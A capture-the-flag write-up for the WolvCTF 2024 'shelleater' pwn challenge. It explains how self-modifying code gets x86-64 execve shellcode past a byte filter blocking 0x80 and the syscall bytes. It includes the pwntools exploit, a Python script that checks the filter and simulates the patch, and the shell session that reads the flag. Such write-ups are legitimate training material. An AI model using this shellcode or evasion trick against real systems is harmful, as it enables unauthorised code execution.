WolvCTF 2024 - Pwn: shelleater
Date: 2024-03-20
Task
go ahead, give me a shell >;)
nc shelleater.wolvctf.io 1337
Author: beanmite
Points: 100
Solves: 82 / 622 (13.183%)
Writeup
In this challenge, the program reads shellcode from stdin and executes it, but only if the byte 0x80 (the second byte of int 0x80, encoded cd 80) and the two-byte sequence 0f 05 (the syscall instruction) do not appear anywhere in the input.
The filter only inspects the bytes as sent, so we can bypass it with self-modifying code: emit the syscall as 0e 05 and let the shellcode increment that byte at run time, just before execution reaches it:
from pwn import asm, remote
sc = asm('''
xor rax, rax                      /* rax = 0 */
push rax                          /* NULL qword, terminates the string below */
add rax, 59                       /* rax = SYS_execve (59) on x86-64 */
mov rdi, 0x68732f2f6e69622f       /* "/bin//sh" in little-endian */
push rdi                          /* string now sits at [rsp] */
mov rdi, rsp                      /* rdi = pointer to "/bin//sh" */
xor rsi, rsi                      /* argv = NULL */
xor rdx, rdx                      /* envp = NULL */
add dword ptr [rsp + 49], 1       /* turn the 0e below into 0f; no 0f 05 in the sent bytes */
.byte 0xe                         /* becomes 0f 05 = syscall after the add above */
.byte 0x05
''', arch='x86-64')
p = remote('shelleater.wolvctf.io', 1337)
p.send(sc)
p.interactive()
This shellcode sets up everything for an execve("/bin//sh", NULL, NULL) syscall (rax = 59, rdi pointing at the string on the stack, rsi = rdx = 0), then adds 1 to the dword at rsp+49. That address is the 0x0e byte of the shellcode itself: the two pushes move rsp down by 16 bytes, and the 0x0e sits 33 bytes into the code, so 16 + 33 = 49. The displacement therefore only works because the program enters the shellcode with rsp pointing at its first byte; on a target that jumped into the buffer differently the offset would have to be adjusted. Since 0x0e + 1 does not carry, the dword-sized add leaves the bytes after 0x05 untouched. The increment changes 0E 05 into 0F 05 in memory, so the CPU executes a syscall instruction that never appeared in the bytes the filter inspected.
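To check a payload against this kind of filter offline, and to see exactly what the self-modifying add does, here is an added example in plain Python that is not part of the original writeup. The byte encoding is hand-assembled from the asm() block above (so it runs without pwntools or a live target), and the filter rules (reject byte 0x80 and the sequence 0f 05) are taken from the task description; the assumption that the shellcode starts at the entry value of rsp is what the displacement calculation encodes.

```python
# Added example, not from the original writeup: filter check and patch
# simulation for the shelleater payload, without pwntools or the server.

FORBIDDEN_BYTES = {0x80}        # would complete `int 0x80` (cd 80)
FORBIDDEN_SEQS = [b"\x0f\x05"]  # `syscall`
PLACEHOLDER = b"\x0e\x05"       # what we send instead of 0f 05

# Hand-assembled encoding of the asm() block above (x86-64, Intel syntax).
SHELLCODE = bytes.fromhex(
    "4831c0"                # xor rax, rax
    "50"                    # push rax
    "4883c03b"              # add rax, 59
    "48bf2f62696e2f2f7368"  # mov rdi, 0x68732f2f6e69622f ("/bin//sh")
    "57"                    # push rdi
    "4889e7"                # mov rdi, rsp
    "4831f6"                # xor rsi, rsi
    "4831d2"                # xor rdx, rdx
    "8344243101"            # add dword ptr [rsp + 49], 1
    "0e05"                  # placeholder for syscall (0f 05)
)

# Number of 8-byte pushes executed before the `add` runs (assumption: the
# shellcode starts at the value rsp has on entry, as in the writeup).
PUSHES_BEFORE_PATCH = 2


def filter_hits(code: bytes) -> list:
    """Return (offset, reason) for every byte/sequence the challenge rejects."""
    hits = []
    for i, b in enumerate(code):
        if b in FORBIDDEN_BYTES:
            hits.append((i, f"byte {b:#04x}"))
    for seq in FORBIDDEN_SEQS:
        start = 0
        while (i := code.find(seq, start)) != -1:
            hits.append((i, f"sequence {seq.hex()}"))
            start = i + 1
    return sorted(hits)


def expected_displacement(code: bytes, pushes: int = PUSHES_BEFORE_PATCH) -> int:
    """rsp-relative displacement the `add` must use to hit the placeholder:
    the pushes lowered rsp by 8*pushes, and the placeholder sits at a fixed
    offset inside the code."""
    return pushes * 8 + code.index(PLACEHOLDER)


def simulate_patch(code: bytes, disp: int, pushes: int = PUSHES_BEFORE_PATCH) -> bytes:
    """Apply `add dword ptr [rsp+disp], 1` to a copy of the code, with
    rsp = code_start - 8*pushes at that point. The dword may extend past the
    end of our bytes; those trailing bytes are outside the payload, and since
    0x0e + 1 does not carry they are left unchanged anyway."""
    off = disp - pushes * 8
    buf = bytearray(code)
    chunk = bytes(buf[off:off + 4])
    val = (int.from_bytes(chunk, "little") + 1) & 0xFFFFFFFF
    buf[off:off + 4] = val.to_bytes(4, "little")[:len(chunk)]
    return bytes(buf)


def verify(code: bytes = SHELLCODE) -> dict:
    """Summarise: is the payload clean as sent, which displacement does it
    need, and does a syscall appear once the add has run?"""
    disp = expected_displacement(code)
    patched = simulate_patch(code, disp)
    return {
        "clean_as_sent": not filter_hits(code),
        "displacement": disp,
        "syscall_after_patch": b"\x0f\x05" in patched,
        "patched_tail": patched[-2:].hex(),
    }


if __name__ == "__main__":
    for k, v in verify().items():
        print(f"{k}: {v}")
```

If the challenge entered the buffer with a different rsp (for example via a call, which would lower rsp by another 8 bytes), expected_displacement() is the one place to change: raise the push count by one and re-assemble with the new displacement.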
After running the script, we can get the flag with the following commands:
$ python s.py
[+] Opening connection to shelleater.wolvctf.io on port 1337: Done
[*] Switching to interactive mode
== proof-of-work: disabled ==
shell go here :)
$ ls
chal
flag.txt
$ cat flag.txt
wctf{1_s3ash3ll_1_3at_1t}